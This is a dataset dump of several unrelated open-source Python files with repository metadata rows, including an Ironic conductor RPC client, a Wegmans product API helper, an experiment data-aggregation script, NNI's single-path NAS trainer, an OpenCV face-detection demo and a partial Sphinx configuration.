:raises: DriverNotFound.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.16')
return cctxt.call(context, 'get_driver_properties',
driver_name=driver_name)
def set_boot_device(self, context, node_id, device, persistent=False,
topic=None):
"""Set the boot device for a node.
Set the boot device to use on next reboot of the node. Be aware
that not all drivers support this.
:param context: request context.
:param node_id: node id or uuid.
:param device: the boot device, one of
:mod:`ironic.common.boot_devices`.
:param persistent: Whether to set next-boot, or make the change
permanent. Default: False.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified or an invalid boot device is specified.
:raises: MissingParameterValue if missing supplied info.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'set_boot_device', node_id=node_id,
device=device, persistent=persistent)
def get_boot_device(self, context, node_id, topic=None):
"""Get the current boot device.
Returns the current boot device of a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified.
:raises: MissingParameterValue if missing supplied info.
:returns: a dictionary containing:
:boot_device: the boot device, one of
:mod:`ironic.common.boot_devices` or None if it is unknown.
:persistent: Whether the boot device will persist to all
future boots or not, None if it is unknown.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'get_boot_device', node_id=node_id)
def get_supported_boot_devices(self, context, node_id, topic=None):
"""Get the list of supported devices.
Returns the list of supported boot devices of a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified.
:raises: MissingParameterValue if missing supplied info.
:returns: A list with the supported boot devices defined
in :mod:`ironic.common.boot_devices`.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'get_supported_boot_devices',
node_id=node_id)
def inspect_hardware(self, context, node_id, topic=None):
"""Signals the conductor service to perform hardware introspection.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: HardwareInspectionFailure
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support inspection.
:raises: InvalidStateRequested if 'inspect' is not a valid
action to do in the current state.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.24')
return cctxt.call(context, 'inspect_hardware', node_id=node_id)
def destroy_port(self, context, port, topic=None):
"""Delete a port.
:param context: request context.
:param port: port object
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeNotFound if the node associated with the port does not
exist.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.25')
return cctxt.call(context, 'destroy_port', port=port)
def set_target_raid_config(self, context, node_id, target_raid_config,
topic=None):
"""Stores the target RAID configuration on the node.
Stores the target RAID configuration on node.target_raid_config
:param context: request context.
:param node_id: node id or uuid.
:param target_raid_config: Dictionary containing the target RAID
configuration. It may be an empty dictionary as well.
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support RAID configuration.
:raises: InvalidParameterValue, if validation of target raid config
fails.
:raises: MissingParameterValue, if some required parameters are
missing.
:raises: NodeLocked if node is locked by another conductor.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.30')
return cctxt.call(context, 'set_target_raid_config',
node_id=node_id,
target_raid_config=target_raid_config)
def get_raid_logical_disk_properties(self, context, driver_name,
topic=None):
"""Get the logical disk properties for RAID configuration.
Gets the information about logical disk properties which can
be specified in the input RAID configuration.
:param context: request context.
:param driver_name: name of the driver
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the driver doesn't
support RAID configuration.
:returns: A dictionary containing the properties that can be mentioned
for logical disks and a textual description for them.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.30')
return cctxt.call(context, 'get_raid_logical_disk_properties',
driver_name=driver_name)
def do_node_clean(self, context, node_id, clean_steps, topic=None):
"""Signal to conductor service to perform manual cleaning on a node.
:param context: request context.
:param node_id: node ID or UUID.
:param clean_steps: a list of clean step dictionaries.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue if validation of power driver interface
failed.
:raises: InvalidStateRequested if cleaning can not be performed.
:raises: NodeInMaintenance if node is in maintenance mode.
:raises: NodeLocked if node is locked by another conductor.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.32')
return cctxt.call(context, 'do_node_clean',
node_id=node_id, clean_steps=clean_steps)
def object_class_action_versions(self, context, objname, objmethod,
object_versions, args, kwargs):
"""Perform an action on a VersionedObject class.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the action
:param objname: The registry name of the object
:param objmethod: The name of the action method to call
:param object_versions: A dict of {objname: version} mappings
:param args: The positional arguments to the action method
:param kwargs: The keyword arguments to the action method
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: The result of the action method, which may (or may not)
be an instance of the implementing VersionedObject class.
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_class_action_versions',
objname=objname, objmethod=objmethod,
object_versions=object_versions,
args=args, kwargs=kwargs)
def object_action(self, context, objinst, objmethod, args, kwargs):
"""Perform an action on a VersionedObject instance.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the action
:param objinst: The object instance on which to perform the action
:param objmethod: The name of the action method to call
:param args: The positional arguments to the action method
:param kwargs: The keyword arguments to the action method
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: A tuple with the updates made to the object and
the result of the action method
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_action', objinst=objinst,
objmethod=objmethod, args=args, kwargs=kwargs)
def object_backport_versions(self, context, objinst, object_versions):
"""Perform a backport of an object instance.
The default behavior of the base VersionedObjectSerializer, upon
receiving an object with a version newer than what is in the local
registry, is to call this method to request a backport of the object.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the backport
:param objinst: An instance of a VersionedObject to be backported
:param object_versions: A dict of {objname: version} mappings
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: The downgraded instance of objinst
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_backport_versions', objinst=objinst,
object_versions=object_versions)
| 46.078621 | 79 | 0.64723 |
7946374e036143a05e6a4b7e8aa1ef97ad901fad | 1,330 | py | Python | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
"MIT"
] | 2 | 2020-02-26T16:43:07.000Z | 2021-03-19T20:03:58.000Z | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
"MIT"
] | null | null | null | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
"MIT"
] | 1 | 2021-06-19T03:43:04.000Z | 2021-06-19T03:43:04.000Z | import requests, os, json, sys
MAX_RESULTS = 1
DIR = os.path.dirname(__file__) or '.'
KEY = json.loads(open(DIR + "/../secrets.JSON").read())['wegmans']
headers = {
'Cache-Control': 'no-cache',
"Subscription-Key": KEY,
}
params = {
"api-version": "2018-10-18",
}
def get_skus(food):
query = {
"query": food,
"results": MAX_RESULTS,
**params,
}
resp = requests.get("https://api.wegmans.io/products/search/", headers=headers, params=query)
if resp.status_code != 200:
return None
return [food['sku'] for food in json.loads(resp.content)['results']]
def get_food_data_by_sku(sku):
resp = requests.get("https://api.wegmans.io/products/" + str(sku), headers=headers, params=params)
if resp.status_code != 200:
return None
return json.loads(resp.content)
def get_food_data(food):
skus = get_skus(food)
if not skus:
return None
return list(filter(lambda x: x, [get_food_data_by_sku(sku) for sku in skus]))
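# Illustrative call (assumption; the exact fields returned depend on the
# Wegmans API response):
#   products = get_food_data("olive oil")
#   names = [p['name'] for p in products]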
if __name__ == '__main__':
# if len(sys.argv) < 2:
# print("Please input a food")
# exit()
# for item in get_food_data(sys.argv[1]):
# print(item['name'])
# print("\n")
#for item in get_food_data("vegan butter"):
# print(item)
print(get_food_data_by_sku(11914))
| 24.62963 | 102 | 0.615038 |
7946378dbb436e566d105fa17001f7a17515f8b4 | 11,103 | py | Python | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 1 | 2021-09-17T13:17:07.000Z | 2021-09-17T13:17:07.000Z | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 1 | 2020-11-09T16:52:34.000Z | 2020-12-11T02:32:40.000Z | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 2 | 2021-08-11T00:08:01.000Z | 2021-08-12T18:14:45.000Z | '''
This is a utility script for aggregating data (on MSU's HPCC) for this experiment.
WARNING: this script might not age well (makes assumptions about file systems, etc)!
For each run, grab the maximum fitness organism at end of run.
'''
import argparse, os, copy, errno, csv, re, sys
import hjson,json
csv.field_size_limit(sys.maxsize)
key_settings = [
"SEED",
"matchbin_metric",
"matchbin_thresh",
"matchbin_regulator",
"TAG_LEN",
"NUM_ENV_STATES",
"NUM_ENV_UPDATES",
"USE_FUNC_REGULATION",
"USE_GLOBAL_MEMORY",
"MUT_RATE__INST_ARG_SUB",
"MUT_RATE__INST_SUB",
"MUT_RATE__INST_INS",
"MUT_RATE__INST_DEL",
"MUT_RATE__SEQ_SLIP",
"MUT_RATE__FUNC_DUP",
"MUT_RATE__FUNC_DEL",
"MUT_RATE__INST_TAG_BF",
"MUT_RATE__FUNC_TAG_BF",
"CPU_CYCLES_PER_ENV_UPDATE",
"MAX_FUNC_CNT",
"MAX_FUNC_INST_CNT",
"MAX_ACTIVE_THREAD_CNT",
"MAX_THREAD_CAPACITY",
"TOURNAMENT_SIZE",
"INST_MIN_ARG_VAL",
"INST_MAX_ARG_VAL"
]
"""
This is functionally equivalent to the mkdir -p [fname] bash command
"""
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
"""
Given the path to a run's config file, extract the run's settings.
"""
def extract_settings(run_config_path):
content = None
with open(run_config_path, "r") as fp:
content = fp.read().strip().split("\n")
header = content[0].split(",")
header_lu = {header[i].strip():i for i in range(0, len(header))}
content = content[1:]
configs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
return {param[header_lu["parameter"]]:param[header_lu["value"]] for param in configs}
def find_org_analysis_path(run_path, update):
output_path = os.path.join(run_path, "output")
# Find all org analysis files (analysis_org_0_update_1000.csv)
analysis_files = [fname for fname in os.listdir(output_path) if "analysis_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(analysis_files, key=max_key))
def find_trace_path(run_path, update):
output_path = os.path.join(run_path, "output")
trace_files = [fname for fname in os.listdir(output_path) if "trace_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(trace_files, key=max_key))
"""
Aggregate!
"""
def main():
# Setup the commandline argument parser
parser = argparse.ArgumentParser(description="Data aggregation script.")
parser.add_argument("--data", type=str, nargs="+", help="Where should we pull data (one or more locations)?")
parser.add_argument("--dump", type=str, help="Where to dump this?", default=".")
parser.add_argument("--update", type=int, default=-1, help="What is the maximum update we should pull organisms from?")
parser.add_argument("--out_fname", type=str, help="What should we call the output file?", default="max_fit_orgs.csv")
# Extract arguments from commandline
args = parser.parse_args()
data_dirs = args.data
dump_dir = args.dump
dump_fname = args.out_fname
update = args.update
# Are all data directories for real?
if any([not os.path.exists(loc) for loc in data_dirs]):
print("Unable to locate all data directories. Able to locate:", {loc: os.path.exists(loc) for loc in data_dirs})
exit(-1)
mkdir_p(dump_dir)
# Aggregate a list of all runs
run_dirs = [os.path.join(data_dir, run_dir) for data_dir in data_dirs for run_dir in os.listdir(data_dir) if "RUN_" in run_dir]
# sort run directories by seed to make easier on the eyes
run_dirs.sort(key=lambda x : int(x.split("_")[-1]))
print(f"Found {len(run_dirs)} run directories.")
analysis_header_set = set() # Use this to guarantee all organism file headers match.
# For each run, aggregate max fitness organism information.
analysis_org_infos = []
for run in run_dirs:
print(f"Extracting information from {run}")
run_config_path = os.path.join(run, "output", "run_config.csv")
        # these find functions will crash (max() over an empty list) if the run has no analysis/trace output files
org_analysis_path = find_org_analysis_path(run, update if update >= 0 else None)
org_trace_path = find_trace_path(run, update if update >= 0 else None)
max_fit_path = os.path.join(run, "output", "max_fit_org.csv")
if not os.path.exists(run_config_path):
print(f"Failed to find run parameters ({run_config_path})")
exit(-1)
# double check that analysis and trace files are from the same update and org ID
analysis_update = org_analysis_path.split("/")[-1].split("_update_")[-1].split(".")[0]
trace_update = org_trace_path.split("/")[-1].split("_update_")[-1].split(".")[0]
if analysis_update != trace_update:
print(f"Analysis file and trace file updates do not match: \n * {analysis_update}\n * {trace_update}\n")
exit(-1)
analysis_id = org_analysis_path.split("/")[-1].split("org_")[-1].split("_")[0]
trace_id = org_trace_path.split("/")[-1].split("org_")[-1].split("_")[0]
if analysis_id != trace_id:
print(f"Analysis file and trace file updates do not match: \n * {analysis_id}\n * {trace_id}\n")
exit(-1)
# extract run settings
run_settings = extract_settings(run_config_path)
# ========= extract analysis file info =========
content = None
with open(max_fit_path, "r") as fp:
content = fp.read().strip().split("\n")
max_fit_header = content[0].split(",")
max_fit_header_lu = {max_fit_header[i].strip():i for i in range(0, len(max_fit_header))}
content = content[1:]
orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
max_fit_org = orgs[-1]
max_fit_id = max_fit_org[max_fit_header_lu["pop_id"]]
if max_fit_id != analysis_id:
print("Max fit id: ", max_fit_id)
print("Analysis id: ", analysis_id)
print("Something's gone WRONG!")
exit(-1)
# Fields to collect from max fit file.
max_fit_vals = {
"update": max_fit_org[max_fit_header_lu["update"]],
"solution": max_fit_org[max_fit_header_lu["solution"]],
"score": max_fit_org[max_fit_header_lu["score"]],
"num_matches": max_fit_org[max_fit_header_lu["num_matches"]],
"num_misses": max_fit_org[max_fit_header_lu["num_misses"]],
"num_no_responses": max_fit_org[max_fit_header_lu["num_no_responses"]]
}
max_fit_fields = ["update","solution","score","num_matches","num_misses","num_no_responses"]
# ========= extract analysis file info =========
content = None
with open(org_analysis_path, "r") as fp:
content = fp.read().strip().split("\n")
analysis_header = content[0].split(",")
analysis_header_lu = {analysis_header[i].strip():i for i in range(0, len(analysis_header))}
content = content[1:]
analysis_orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
num_analyses = len(analysis_orgs)
num_analysis_solutions = 0
num_analysis_solutions_ko_reg = 0
num_analysis_solutions_ko_mem = 0
num_analysis_solutions_ko_all = 0
solution_score = float(run_settings["NUM_ENV_UPDATES"])
all_solution = True
all_solution_ko_reg = True
all_solution_ko_mem = True
all_solution_ko_all = True
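        # Tally how many analyses remain solutions when regulation, global memory,
        # or both are knocked out, and whether that holds for every analysis.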
for analysis_org in analysis_orgs:
org_info = { analysis_header[i]:analysis_org[i] for i in range(0, len(analysis_org)) }
base_score = float(org_info["score"])
ko_reg_score = float(org_info["score_ko_regulation"])
ko_mem_score = float(org_info["score_ko_global_memory"])
ko_all_score = float(org_info["score_ko_all"])
is_sol = base_score >= solution_score
ko_reg_is_sol = ko_reg_score >= solution_score
ko_mem_is_sol = ko_mem_score >= solution_score
ko_all_is_sol = ko_all_score >= solution_score
if (is_sol):
num_analysis_solutions += 1
else:
all_solution = False
if (ko_reg_is_sol):
num_analysis_solutions_ko_reg += 1
else:
all_solution_ko_reg = False
if (ko_mem_is_sol):
num_analysis_solutions_ko_mem += 1
else:
all_solution_ko_mem = False
if (ko_all_is_sol):
num_analysis_solutions_ko_all += 1
else:
all_solution_ko_all = False
# end analysis file for loop
analysis_vals = {
"num_analyses": num_analyses,
"num_analysis_solutions": num_analysis_solutions,
"num_analysis_solutions_ko_reg": num_analysis_solutions_ko_reg,
"num_analysis_solutions_ko_mem": num_analysis_solutions_ko_mem,
"num_analysis_solutions_ko_all": num_analysis_solutions_ko_all,
"all_solution": int(all_solution),
"all_solution_ko_reg": int(all_solution_ko_reg),
"all_solution_ko_mem": int(all_solution_ko_mem),
"all_solution_ko_all": int(all_solution_ko_all)
}
analysis_fields=["num_analyses","num_analysis_solutions","num_analysis_solutions_ko_reg","num_analysis_solutions_ko_mem","num_analysis_solutions_ko_all","all_solution","all_solution_ko_reg","all_solution_ko_mem","all_solution_ko_all"]
analysis_header_set.add(",".join([key for key in key_settings] + max_fit_fields + analysis_fields))
if len(analysis_header_set) > 1:
print(f"Header mismatch! ({org_analysis_path})")
exit(-1)
# # surround things in quotes that need it
# org[analysis_header_lu["program"]] = "\"" + org[analysis_header_lu["program"]] + "\""
analysis_org_infos.append([run_settings[key] for key in key_settings] + [max_fit_vals[field] for field in max_fit_fields] + [analysis_vals[field] for field in analysis_fields])
# Output analysis org infos
out_content = list(analysis_header_set)[0] + "\n" # Should be guaranteed to be length 1!
out_content += "\n".join([",".join(map(str, line)) for line in analysis_org_infos])
with open(os.path.join(dump_dir, dump_fname), "w") as fp:
fp.write(out_content)
print(f"Done! Output written to {os.path.join(dump_dir, dump_fname)}")
if __name__ == "__main__":
main() | 43.541176 | 242 | 0.646942 |
794639c68dcadd609799a0180bdea577c3ada072 | 7,471 | py | Python | nni/retiarii/oneshot/pytorch/random.py | ggzhang0071/nni | f4145e62d89c3ca383cf00f2de5dfd2d1025ad92 | [
"MIT"
] | 9,680 | 2019-05-07T01:42:30.000Z | 2022-03-31T16:48:33.000Z | nni/retiarii/oneshot/pytorch/random.py | soma2000-lang/nni | eaad98528c7aa714c9848800d607d6aa3bdd531d | [
"MIT"
] | 1,957 | 2019-05-06T21:44:21.000Z | 2022-03-31T09:21:53.000Z | nni/retiarii/oneshot/pytorch/random.py | soma2000-lang/nni | eaad98528c7aa714c9848800d607d6aa3bdd531d | [
"MIT"
] | 1,571 | 2019-05-07T06:42:55.000Z | 2022-03-31T03:19:24.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import random
import torch
import torch.nn as nn
from ..interface import BaseOneShotTrainer
from .utils import AverageMeterGroup, replace_layer_choice, replace_input_choice, to_device
_logger = logging.getLogger(__name__)
def _get_mask(sampled, total):
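    # e.g. _get_mask(1, 3) -> tensor([False, True, False]);
    #      _get_mask([0, 2], 3) -> tensor([True, False, True])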
multihot = [i == sampled or (isinstance(sampled, list) and i in sampled) for i in range(total)]
return torch.tensor(multihot, dtype=torch.bool) # pylint: disable=not-callable
class PathSamplingLayerChoice(nn.Module):
"""
    Mixed module whose forward pass is computed by exactly one or several (sampled) candidate modules.
    If multiple modules are selected, their outputs are summed and returned.
Attributes
----------
sampled : int or list of int
Sampled module indices.
mask : tensor
A multi-hot bool 1D-tensor representing the sampled mask.
"""
def __init__(self, layer_choice):
super(PathSamplingLayerChoice, self).__init__()
self.op_names = []
for name, module in layer_choice.named_children():
self.add_module(name, module)
self.op_names.append(name)
assert self.op_names, 'There has to be at least one op to choose from.'
self.sampled = None # sampled can be either a list of indices or an index
def forward(self, *args, **kwargs):
assert self.sampled is not None, 'At least one path needs to be sampled before fprop.'
if isinstance(self.sampled, list):
return sum([getattr(self, self.op_names[i])(*args, **kwargs) for i in self.sampled]) # pylint: disable=not-an-iterable
else:
return getattr(self, self.op_names[self.sampled])(*args, **kwargs) # pylint: disable=invalid-sequence-index
def __len__(self):
return len(self.op_names)
@property
def mask(self):
return _get_mask(self.sampled, len(self))
class PathSamplingInputChoice(nn.Module):
"""
    Mixed input. Takes a list of tensors as input, selects some of them, and returns the sum.
Attributes
----------
sampled : int or list of int
Sampled module indices.
mask : tensor
A multi-hot bool 1D-tensor representing the sampled mask.
"""
def __init__(self, input_choice):
super(PathSamplingInputChoice, self).__init__()
self.n_candidates = input_choice.n_candidates
self.n_chosen = input_choice.n_chosen
self.sampled = None
def forward(self, input_tensors):
if isinstance(self.sampled, list):
return sum([input_tensors[t] for t in self.sampled]) # pylint: disable=not-an-iterable
else:
return input_tensors[self.sampled]
def __len__(self):
return self.n_candidates
@property
def mask(self):
return _get_mask(self.sampled, len(self))
class SinglePathTrainer(BaseOneShotTrainer):
"""
Single-path trainer. Samples a path every time and backpropagates on that path.
Parameters
----------
model : nn.Module
Model with mutables.
loss : callable
Called with logits and targets. Returns a loss tensor.
metrics : callable
Returns a dict that maps metrics keys to metrics data.
optimizer : Optimizer
Optimizer that optimizes the model.
num_epochs : int
Number of epochs of training.
dataset_train : Dataset
        Dataset for training.
    dataset_valid : Dataset
        Dataset for validation.
batch_size : int
Batch size.
workers: int
        Number of workers for data preprocessing. Not used by this trainer; may be removed in the future.
device : torch.device
Device object. Either ``torch.device("cuda")`` or ``torch.device("cpu")``. When ``None``, trainer will
        automatically detect an available GPU and prefer it over CPU.
log_frequency : int
Number of mini-batches to log metrics.
"""
def __init__(self, model, loss, metrics,
optimizer, num_epochs, dataset_train, dataset_valid,
batch_size=64, workers=4, device=None, log_frequency=None):
self.model = model
self.loss = loss
self.metrics = metrics
self.optimizer = optimizer
self.num_epochs = num_epochs
self.dataset_train = dataset_train
self.dataset_valid = dataset_valid
self.batch_size = batch_size
self.workers = workers
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device
self.log_frequency = log_frequency
self.model.to(self.device)
self.nas_modules = []
replace_layer_choice(self.model, PathSamplingLayerChoice, self.nas_modules)
replace_input_choice(self.model, PathSamplingInputChoice, self.nas_modules)
for _, module in self.nas_modules:
module.to(self.device)
self.train_loader = torch.utils.data.DataLoader(self.dataset_train,
batch_size=batch_size,
num_workers=workers)
self.valid_loader = torch.utils.data.DataLoader(self.dataset_valid,
batch_size=batch_size,
num_workers=workers)
def _resample(self):
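        # Draw one random index per unique module name, so modules that share a
        # name (label) receive the same sampled choice in a single resample pass.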
result = {}
for name, module in self.nas_modules:
if name not in result:
result[name] = random.randint(0, len(module) - 1)
module.sampled = result[name]
return result
def _train_one_epoch(self, epoch):
self.model.train()
meters = AverageMeterGroup()
for step, (x, y) in enumerate(self.train_loader):
x, y = to_device(x, self.device), to_device(y, self.device)
self.optimizer.zero_grad()
self._resample()
logits = self.model(x)
loss = self.loss(logits, y)
loss.backward()
self.optimizer.step()
metrics = self.metrics(logits, y)
metrics["loss"] = loss.item()
meters.update(metrics)
if self.log_frequency is not None and step % self.log_frequency == 0:
_logger.info("Epoch [%s/%s] Step [%s/%s] %s", epoch + 1,
self.num_epochs, step + 1, len(self.train_loader), meters)
def _validate_one_epoch(self, epoch):
self.model.eval()
meters = AverageMeterGroup()
with torch.no_grad():
for step, (x, y) in enumerate(self.valid_loader):
x, y = to_device(x, self.device), to_device(y, self.device)
self._resample()
logits = self.model(x)
loss = self.loss(logits, y)
metrics = self.metrics(logits, y)
metrics["loss"] = loss.item()
meters.update(metrics)
if self.log_frequency is not None and step % self.log_frequency == 0:
_logger.info("Epoch [%s/%s] Validation Step [%s/%s] %s", epoch + 1,
self.num_epochs, step + 1, len(self.valid_loader), meters)
def fit(self):
for i in range(self.num_epochs):
self._train_one_epoch(i)
self._validate_one_epoch(i)
def export(self):
return self._resample()
RandomTrainer = SinglePathTrainer
| 36.622549 | 131 | 0.614376 |
79463aa6179ea893e72e58e04173fa5dca696507 | 536 | py | Python | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | import cv2
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')
img = cv2.imread('data/melissa.jpg')
new_width = 320
scale_factor = new_width / img.shape[1]
new_height = scale_factor * img.shape[0]
new_shape = (new_width, int(new_height))
img = cv2.resize(img, new_shape)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
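# detectMultiScale positional arguments: 1.3 is the image-pyramid scale factor and
# 5 is the minimum number of neighbour rectangles required to keep a detection.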
faces = face_cascade.detectMultiScale(img_gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 255), 2)
cv2.imshow('Result', img)
cv2.waitKey(0)
| 31.529412 | 80 | 0.727612 |
79463ac174641f0eab4745a982f77d383c42f94b | 7,916 | py | Python | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# wineqdvc documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'wineqdvc'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
